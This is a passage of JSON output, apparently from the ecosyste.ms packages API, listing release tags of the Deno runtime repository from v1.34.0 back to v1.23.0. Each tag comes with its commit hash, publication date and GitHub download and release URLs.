dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/